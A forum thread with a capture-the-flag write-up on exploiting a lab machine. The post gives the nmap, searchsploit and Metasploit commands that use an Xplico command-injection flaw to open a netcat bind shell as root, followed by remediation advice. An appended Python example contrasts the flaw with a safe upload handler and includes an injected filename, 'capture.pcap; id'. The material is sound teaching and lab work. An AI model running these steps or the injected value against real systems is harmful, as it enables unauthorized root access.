• Members 1 post
    May 18, 2019, 10:38 p.m.

    Browny Writeup

    Browny was a sweet and easy box as its name sounds. It's a great box for beginners to test their skills.

    Machine Name: Browny
    Machine IP: 10.1.1.17
    Machine Difficulty: 1/10
    Creator: H4d3s

    Overview

    • Port Scan
    • Explore Port 9876
    • Find Unauthenticated Remote Code Execution for software running on Port 9876
    • Use Metasploit to exploit

    Writeup

    Using nmap to scan the host:
    nmap -sV 10.1.1.17
    i.imgur.com/uBxmv6g.png

    Browsing to Port 9876 using the Web Browser, we can see Xplico running:
    One of the features of Xplico is related to parsing PCAP files. Once a PCAP file is uploaded, Xplico executes an operating system command in order to calculate the checksum of the file. The name of the file for this operation is taken directly from user input and then used inside the command without proper input validation.
    i.imgur.com/5a0hDfK.png

    Using Searchsploit we can see there is a RCE:
    searchsploit 'Xplico'
    i.imgur.com/Zyf4fTw.png

    We can also Google Xplico Exploit:
    i.imgur.com/NZchake.png

    Setting up Metasploit with the correct module:
    msf5 > use exploit/linux/http/xplico_exec
    i.imgur.com/D67iKn9.png

    Setting the correct payload:
    msf5 > show payloads
    msf5 > set Payload cmd/unix/bind_netcat
    i.imgur.com/nk2XMKM.png

    After running the module we will notice there is no prompt, however if we type in a command we see that we have a shell:
    id
    i.imgur.com/BlPrBD9.png

    We see that we are root, as Xplico was running as root.

    Remediation

    • Patch software
    • Try avoiding running services as root if possible. Create special accounts for the purpose of running a service to help isolate in case an attacker is able to break in.

    Thank you for reading.

    EOF
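Added example, not part of the original post and not Xplico's own code: the flaw described above (an upload name pasted into a checksum command) shown next to a handler that hashes the file in-process and stores it under a server-generated name. The `sha256sum` command string, the `/tmp/uploads/` path, and all function names are assumptions made for illustration.

```python
import hashlib
import os
import secrets
import shlex
import tempfile

# Constructed sample input: an upload name containing a shell metacharacter.
HOSTILE_NAME = "capture.pcap; id"

def unsafe_command(upload_name):
    """Flawed pattern: user input concatenated into a shell string.
    Built here only for inspection; it is never executed."""
    return "sha256sum /tmp/uploads/" + upload_name  # hypothetical command

def shell_tokens(command):
    """Tokenize roughly as a shell would, keeping ';' as its own token."""
    return list(shlex.shlex(command, punctuation_chars=True))

def store_upload(data, upload_dir):
    """Save under a server-generated name; the client's name is never a path."""
    path = os.path.join(upload_dir, secrets.token_hex(16) + ".pcap")
    with open(path, "wb") as fh:
        fh.write(data)
    return path

def checksum(path):
    """Hash in-process: no shell and no command line to inject into."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

def handle_upload(upload_name, data, upload_dir):
    """Keep the client-supplied name as display metadata only."""
    path = store_upload(data, upload_dir)
    return {"display_name": upload_name, "stored_as": path,
            "sha256": checksum(path)}

if __name__ == "__main__":
    # The ';' token shows the string holds two commands, not one.
    print(shell_tokens(unsafe_command(HOSTILE_NAME)))
    with tempfile.TemporaryDirectory() as d:
        print(handle_upload(HOSTILE_NAME, b"constructed pcap bytes", d))
```

If an external tool really must be called, pass the path as a separate element of an argument list with the shell disabled; combined with a dedicated non-root service account, a bug like this no longer yields root.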

  • May 18, 2019, 10:48 p.m.

    Very cool writeup 😊

  • Members 1 post
    May 20, 2019, 4:03 p.m.

    Is there a place where I can see which machine will be retired? I would like to create writeups and YouTube videos, but I need to know which machine will be retired to prepare the writeup and publish it after the machine is retired.

  • May 20, 2019, 8:10 p.m.

    Hey!! For the moment, stay tuned on the social networks.